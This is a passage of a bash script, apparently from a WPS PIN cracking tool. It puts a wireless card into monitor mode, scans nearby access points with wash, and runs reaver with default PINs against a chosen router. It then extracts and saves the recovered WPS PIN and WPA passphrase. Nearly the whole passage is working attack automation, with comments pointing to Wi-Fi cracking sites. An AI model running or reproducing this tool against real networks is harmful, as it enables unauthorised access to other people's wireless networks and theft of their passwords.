while [ "$MON_ATTACK" == "" ]; do # at the end of iface we call this function to select an interface for reaver and wash
echo "$INTERFACEDESIGN" ########################## modified according to the selected language #################
for i in ${!MON_INTERFACE[*]}; do # we display the available interface
CHECK_MON_INTERFACE=$(echo ${MON_INTERFACE[${i}]})
if [ "$CHECK_MON_INTERFACE" = "wlan0" ] || [ "$CHECK_MON_INTERFACE" = "wlan1" ] || [ "$CHECK_MON_INTERFACE" = "wlan2" ] || [ "$CHECK_MON_INTERFACE" = "wlan3" ]|| [ "$CHECK_MON_INTERFACE" = "wlan4" ]|| [ "$CHECK_MON_INTERFACE" = "wlan5" ]|| [ "$CHECK_MON_INTERFACE" = "wlan6" ]|| [ "$CHECK_MON_INTERFACE" = "wlan7" ]|| [ "$CHECK_MON_INTERFACE" = "wlan8" ]|| [ "$CHECK_MON_INTERFACE" = "wlan9" ]; then
echo -e " $amarillo$i$blanco ${MON_INTERFACE[${i}]} ${MON_CHIPSET[${i}]} $colorbase" # displayed with this for loop
else
echo -e " $amarillo$i$blanco ${MON_INTERFACE[${i}]} ${MON_CHIPSET[${i}]} $colorbase"
fi
done
echo ""
echo -e " $colorbase ---------------------------------------------------"
echo ""
SELECT_THEIFACE ############################ modified according to the languge ###########################
CHOIX=$( echo " ${MON_INTERFACE[${i}]} ") #CHOIX is the chosen interface by the user
if [ "$CHOIX" == "" ]; then
IFACE_SELECTION # recursively calling the function in case the user made a mistake to re-enter datas
fi
MONITORIZED=$( echo "$CHOIX" | grep mon ) # in case the interface is in mode monitor we create monotorized
if [ "$MONITORIZED" == "" ]; then # if monotorized is empty it means the ethX or wlanX has to be put into monitor mode
sudo ifconfig $CHOIX down # we bring the interface down
MON_ATTACK=$( sudo airmon-ng start $CHOIX | grep enabled | awk -F' ' '{ print $5 }' | sed -e 's/)//g' ) # we activate mode monitor an in the meanwhile we grap the
RT_CHECK=$( echo ${MON_CHIPSET[${i}]} | grep RalinkRT2870 ) # filter for rt3070 that associate better if wlan is up
if [ -n "${RT_CHECK}" ]; then
sudo ifconfig $(echo ${MON_INTERFACE[${i}]}) up
else
sudo ifconfig $(echo ${MON_INTERFACE[${i}]}) down
fi
# identifier of the interface, then we ensure disconexion
else
MON_ATTACK="$CHOIX"
fi # check & disconnect function
done
}
IFACE_SELECTION
CHIPSET_CHECK=$( (echo ${MON_CHIPSET[${i}]}) | grep Unknown ) # last we check if the chipset is unknown and will display a warning if it is true
if [ -n "${CHIPSET_CHECK}" ]; then # if the variableis full then it means ythat chipset is unknown
echo "$AIRMON_WARNING"
sleep 8
fi
}
WASH_SCAN(){ # This function will launch wash generate default PIN for the scanned AP and display the result with some colour
if [ "$WALSH_O_WASH" == "wash" ]; then
declare -a BSSID # We declare array to fill with the scan results, bssuid, essid, etc...
declare -a CHANNEL #
declare -a RSSI
declare -a WPS
declare -a LOCKED
declare -a ESSID
for i in 'BSSID' 'CHANNEL' 'RSSI' 'WPS' 'LOCKED' 'ESSID'; # linking every array with "i"
do
count=1 # start from 1
if [ "$i" == "BSSID" ]; then # First array for bssid of target AP
while read -r line; do # we read our temp file line by line
BSSID[${count}]="$line" #
count=$((count+1)) # and count from one to one
done < <( cat wash_scan.txt | awk -F' ' '{ print $1 }') # we keep the first field using space as a delimiter (Bssid in the scan=
elif [ "$i" == "CHANNEL" ]; then # and so on...
while read -r line; do
CHANNEL[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $2 }') # second field which is the channel number
elif [ "$i" == "RSSI" ]; then # etc...
while read -r line; do
RSSI[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $3 }')
elif [ "$i" == "WPS" ]; then
while read -r line; do
WPS[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $4 }')
elif [ "$i" == "LOCKED" ]; then
while read -r line; do
LOCKED[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $5 }')
elif [ "$i" == "ESSID" ]; then
while read -r line; do
ESSID[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $6 }')
fi
clear
done
else
declare -a BSSID
declare -a ESSID
for i in 'BSSID' 'ESSID';
do
count=1 # start from 1
if [ "$i" == "BSSID" ]; then # First array for bssid of target AP
while read -r line; do # we read our temp file line by line
BSSID[${count}]="$line" #
count=$((count+1)) # and count from one to one
done < <( cat wash_scan.txt | awk -F' ' '{ print $1 }')
elif [ "$i" == "ESSID" ]; then # second array for essid of target AP
while read -r line; do # we read our temp file line by line
ESSID[${count}]="$line" #
count=$((count+1)) # and count from one to one
done < <( cat wash_scan.txt | awk -F' ' '{ print $2 }')
fi
clear
done
fi
WASH_DISPLAY #################################################################to be defined according to the languages##########################################################
OUTPUT
ATTACK
}
REAVER_CHECK(){
# This function is here to check if reaver is installed, if not the user will be in short menu
which reaver &> /dev/null # Thanks antares for this trick for fast checking if reaver is present
if [ $? -ne 0 ]; then
SORTMENUE_WARNING="$NO_REAVER" ########################################### to define according to the language, here to warn about need to install reaver
SHORTMENUE
fi
which walsh &> /dev/null # if the reaver is bypassed user can have reaver 1.3 with walsh or reaver 1.4 with wash so
if [ $? -ne 0 ]; then # we determine which one is gonna be used
WALSH_O_WASH=$( echo "wash")
else
WALSH_O_WASH=$(echo "walsh")
fi
}
ATTACK(){
ATTACK_MENUE_DISPLAY ############################################# definer according to the language
if [ "$ATTACK_MENUE_CHOICE" == 1 ]; then # first option of attack menu: attack with reaver and default PIN
echo ""
echo "$STOP_REAVER" # little message saying that the attack can be stoped by pressing ctrl and c
if [ "$BIG_MENUE_CHOICE" == 1 ]; then # If we have the scan mode we can give the canal in our reaver attack
sudo reaver -b $BSSID -i $MON_ATTACK -p $PIN -vv -c $CHANNEL -d 2 -t 2 -T 2 | tee attack.txt # we put some delay everywhere for not stressing too much AP
else # if not we don't put canal
sudo reaver -b $BSSID -i $MON_ATTACK -p $PIN -vv -d 2 -t 2 -T 2 | tee attack.txt
fi
VICTORY_PIN=$(cat attack.txt | grep "WPS PIN" | cut -d ":" -f2- | cut -c3- | rev | cut -c2- | rev) # in case the key is found we grep the PIN
KEY=$(cat attack.txt | grep "WPA PSK" | cut -d ":" -f2- | cut -c3- | rev | cut -c2- | rev) # and the WPAPASSPHRASE that will be our variable KEY
# we erase the log
if [ "$KEY" == "" ]; then # if no passphrase is recovered than
echo ""
echo "$FAILED" # failed display a message
echo ""
else
echo -e " $blanco WPA$colorbase>>> $rojo $KEY $colorbase " # otherwise appears a success message
echo "$KEY_FOUND"
echo "
KEY FOUND!!! XD
WPA >>>>>> $KEY
ESSID > $ESSID
BSSID > $BSSID
PIN > $VICTORY_PIN
WPA > $KEY
WPA >>>>>> $KEY
WPSPIN for linux www.crack.wifi.com www.facebook.com/soufian.ckin2u www.auditoriaswireless.net
" > $ESSID.txt # data are saved in a little text
echo -e " $azulfluo $ESSID.txt $colorbase"
echo ""
echo -e "ESSID > $blanco $ESSID $colorbase "
echo -e "BSSID > $blanco $BSSID $colorbase "
echo -e "PIN > $rojo $VICTORY_PIN $colorbase "
echo -e "WPA > $amarillo $KEY $colorbase "
rm attack.txt &> /dev/null
fi
ATTACK
elif [ "$ATTACK_MENUE_CHOICE" == 2 ]; then # equal to "select another target"
if [ "$BIG_MENUE_CHOICE" == 2 ]; then # if we are in genrator mode we simply close the loop and go back to the attack menue
echo " "
else
while [ "$ATTACK_MENUE_CHOICE" == 2 ]; do # in case we want to display again the scan results
WASH_SCAN #with reload
OUTPUT
ATTACK
done
fi
elif [ "$ATTACK_MENUE_CHOICE" == 3 ]; then # option "go back to previous menu"
BIG_MENUE
elif [ "$ATTACK_MENUE_CHOICE" == 4 ]; then # option restart/change language
unset
CLEAN
bash WPSPIN.sh
else # option exit
CLEAN
CIAO
exit 0
fi
}
BIG_MENUE(){
BIG_MENUE_DISPLAY # options of the "big menu", WPSPIN with all options available
if [ "$BIG_MENUE_CHOICE" == 1 ]; then # 1 is washscan = scan with wash and attack with reaver guided
echo ""
echo "$WASHWAIT" #####################################REDIGER SELON LANGUE######### nessage to advice the user that the scan is launched and result will be displayed in a while
echo ""
sudo xterm -l -lf scan.txt -e $WALSH_O_WASH -i $MON_ATTACK -C
# sudo xterm -e $WALSH_O_WASH -i $MON_ATTACK -C 2>&1 | tee scan.txt # we take out eh two fist line of wash command and send the scan to temp ; do
if [ "$WALSH_O_WASH" == "wash" ]; then
cat scan.txt | sed '1,6d' | grep "........." > wash_scan.txt
sudo rm scan.txt &> /dev/null
else
cat scan.txt | sed "1,3d" | grep "........." > wash_scan.txt
sudo rm scan.txt &> /dev/null